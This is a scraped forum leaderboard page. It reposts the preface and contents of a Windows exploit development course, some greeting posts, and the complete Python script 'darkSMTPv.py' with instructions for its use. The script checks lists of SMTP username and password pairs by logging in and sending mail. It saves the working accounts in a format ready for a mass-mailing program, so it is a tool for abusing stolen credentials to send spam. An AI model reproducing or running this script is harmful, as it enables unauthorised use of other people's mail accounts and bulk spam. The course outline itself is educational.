
Leaderboard

Popular Content

Showing content with the highest reputation on 07/03/15 in all areas

  1. Hello RST : Exploit Development Course 2015 --> Free

     Preface

     Hi and welcome to this website! I know people don’t like to read prefaces, so I’ll make it short and right to the point.

     This is the preface to a course about Modern Windows Exploit Development. I chose Windows because I’m very familiar with it and also because it’s very popular. In particular, I chose Windows 7 SP1 64-bit. Enough with Windows XP: it’s time to move on!

     There are a few full-fledged courses about Exploit Development but they’re all very expensive. If you can’t afford such courses, you can scour the Internet for papers, articles and some videos. Unfortunately, the information is scattered all around the web and most resources are definitely not for beginners. If you always wanted to learn Exploit Development but either you couldn’t afford it or you had a hard time with it, you’ve come to the right place!

     This is an introductory course but please don’t expect it to be child’s play. Exploit Development is hard and no one can change this fact, no matter how good he/she is at explaining things. I’ll try very hard to be as clear as possible. If there’s something you don’t understand or if you think I made a mistake, you can leave a brief comment or create a thread in the forum for a longer discussion.

     I must admit that I’m not an expert. I did a lot of research to write this course and I also learned a lot by writing it. The fact that I’m an old-time reverse engineer helped a lot, though.

     In this course I won’t just present facts, but I’ll show you how to deduce them by yourself. I’ll try to motivate everything we do. I’ll never tell you to do something without giving you a technical reason for it. In the last part of the course we’ll attack Internet Explorer 10 and 11. My main objective is not just to show you how to attack Internet Explorer, but to show you how a complex attack is first researched and then carried out. Instead of presenting you with facts about Internet Explorer, we’re going to reverse engineer part of Internet Explorer and learn by ourselves how objects are laid out in memory and how we can exploit what we’ve learned. This thoroughness requires that you understand every single step of the process or you’ll get lost in the details.

     As you’ve probably realized by now, English is not my first language (I’m Italian). This means that reading this course has advantages (learning Exploit Development) and disadvantages (unlearning some of your English). Do you still want to read it? Choose wisely

     To benefit from this course you need to know and be comfortable with X86 assembly. This is not negotiable! I didn’t even try to include an assembly primer in this course because you can certainly learn it on your own. Internet is full of resources for learning assembly. Also, this course is very hands-on so you should follow along and replicate what I do. I suggest that you create at least two virtual machines with Windows 7 SP1 64-bit: one with Internet Explorer 10 and the other with Internet Explorer 11.

     I hope you enjoy the ride!

     Contents

       • WinDbg
       • Mona 2
       • Structure Exception Handling (SEH)
       • Heap
       • Windows Basics
       • Shellcode
       • Exploitme1 (ret eip overwrite)
       • Exploitme2 (Stack cookies & SEH)
       • Exploitme3 (DEP)
       • Exploitme4 (ASLR)
       • Exploitme5 (Heap Spraying & UAF)
       • EMET 5.2
       • Internet Explorer 10
           • Reverse Engineering IE
           • From one-byte-write to full process space read/write
           • God Mode (1)
           • God Mode (2)
           • Use-After-Free bug
       • Internet Explorer 11
           • Part 1
           • Part 2

     Regards NO-MERCY

     PDF'S Soooooooon

     Source : http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/
    1 point
  2. My white brother @wirtz
    1 point
  3. Hi, I'm nobody and I'm from Russia, sorry for bad English, I use Google Translate in most cases. My skills: pentesting and web design (full template)
    1 point
  4. Hi, and welcome!
    1 point
  5. #!usr/bin/python #darkSMTPv.py #SMTP Checker - using Authentication #Coded by P47r1ck & low1z #----------------------------------- #... To be continued ... # # #THE CODE WILL TAKE A LIST OF SMTP ACCOUNTS IN THE FOLLOWING FORMAT (IP:USER:PASS) WILL TRY TO LOGIN AND THEN SEND AN #EMAIL TO THE ADDRESS THAT YOU CAN CHANGE ANYTIME IN THE CODE ( look below the #Create the message at the toaddr= )[LINE 33] # #EVERY WORKING SMTP ACCOUNT WILL PRINTED ON THE SCREEN WITH THE FOLLOWING MESSAGE : [!] Email Sent Successfully: IP USER PASS # #THE CODE HAS THE FOLLOWING FEATURES. # # 1. IT WILL SAVE THE LIST OF WORKING SMTP ACCOUNTS TO FILE OUTPUT THAT YOU WILL CHOOSE. # 2. YOU CAN ALSO SPECIFY THE EMAIL WHERE THE SMTP CAN SEND THE TEST EMAIL. # 3. IT WILL MAKE A LIST OF SERVERS FOR THE AMS (ADVANCED MASS SENDER PROGRAM), SO YOU CAN INSERT MORE EASIER THE SMTP #LIST INTO THE AMS.INI FILE FROM THE AMS PROGRAM. (LIST IS SAVED TO AMSlist.txt) # # # MORE FEATURES ARE COMING SOON!!! import sys, smtplib, socket, time from smtplib import SMTP socket.setdefaulttimeout(5) # smtp default timeout, change number to speed up large lists def printHelp(): print '\nHow to use it ? There you go -- > ./darkSMTPv.py <accounts> <outputfile>' print '\nImportant: THE SMTP ACCOUNTS MUST BE IN THE FOLLOWING FORMAT : IP:USER:PASS\n' # Create the message fromaddr = "thewonderousmailmachine@wtfbbq.net" toaddr = "youremail@account.com" #toaddr = "someone@yahoo.com" message = """To: %s From: %s Subject: SMTP Checker! Online! facem un mic test """ % (toaddr,fromaddr) print "\n _ _ _____ __ __ _______ _____ " print " | | | | / ____| \/ |__ __| __ \ " print " __| | __ _ _ __| | _| (___ | \ / | | | | |__) |_ __" print " / _` |/ _` | '__| |/ /\___ \| |\/| | | | | ___/\ \ / /" print "| (_| | (_| | | | < ____) | | | | | | | | \ V / " print " \__,_|\__,_|_| |_|\_\_____/|_| |_| |_| |_| \_/ \n" print "\n This is not stopping here! ... To be continued." print "More features will be added soon. 
For bugs p47r1ckro[at]gmail[dot]com\n" print "_______________________________________________________________________" def timer(): now = time.localtime(time.time()) return time.asctime(now) def sendchk(listindex, host, user, password): # seperated function for checking try: smtp = smtplib.SMTP(host) smtp.login(user, password) code = smtp.ehlo()[0] if not (200 <= code <= 299): code = smtp.helo()[0] if not (200 <= code <= 299): raise SMTPHeloError(code, resp) smtp.sendmail(fromaddr, toaddr, message) print "\n\t[!] Email Sent Successfully:",host, user, password print "\t[!] Message Sent Successfully\n" LSstring = host+":"+user+":"+password+"\n" nList.append(LSstring) # special list for AMS file ID's LFile = open(output, "a") LFile.write(LSstring) # save working host/usr/pass to file LFile.close() AMSout = open("AMSlist.txt", "a") AMSout.write("[Server"+str(nList.index(LSstring))+"]\nName="+str(host)+"\nPort=25\nUserID=User\nBccSize=50\nUserName="+str(user)+"\nPassword="+str(password)+"\nAuthType=0\n\n") smtp.quit() except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg: print "[-] Login Failed:", host, user, password pass if len(sys.argv) != 3: printHelp() exit(1) # Do not change anything below. accounts = sys.argv[1] output = sys.argv[2] try: handle = list(open(accounts)) except: print"\n[+] We were unable to open the SMTP filelist. Check again your path and try again." print"\n[+] Ciao...." #listindex = 0 nList = [] for line in handle: try: host = line.split(':')[0] user = line.split(':')[1].replace('\n', '') password = line.split(':')[2].replace('\n', '') sendchk(handle.index(line), host, user, password) except: print '\n[+] We have found a error in your accounts list' print host, user print '\n[!] IMPORTANT: THE SMTP ACCOUNTS MUST BE IN THE FOLLOWING FORMAT : IP:USER:PASS' print '\n[-] Exiting....\n' exit(1) print "[!] Ended at: " + timer() + ""

     Above you have a verifier written in Python; it is simple to use and is not infected! It was NOT made by me! Put your email address at toaddr = "youremail@account.com"; the SMTPs should be saved in a file in the form ip:user:pass, and it is checked like this: python verfier.py x x1, where x is the list of SMTPs and x1 is the list where the good SMTPs are saved. It will make a separate list for AMS for you; you only need to write Total servers ..... at the top.
    -1 points
  6. -1 points